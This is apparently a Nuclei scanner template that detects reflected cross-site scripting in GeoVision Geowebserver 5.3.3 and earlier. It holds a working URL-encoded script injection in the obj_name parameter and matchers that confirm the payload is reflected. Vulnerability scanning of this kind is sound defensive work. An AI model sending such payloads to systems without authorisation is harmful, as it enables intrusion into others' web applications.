id: geowebserver-xss

info:
  name: GeoVision Geowebserver 5.3.3 - XSS
  author: madrobot
  severity: medium
  description: GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests.
  reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
  tags: geowebserver,xss

requests:
  - raw:
      - |
        GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - text/html
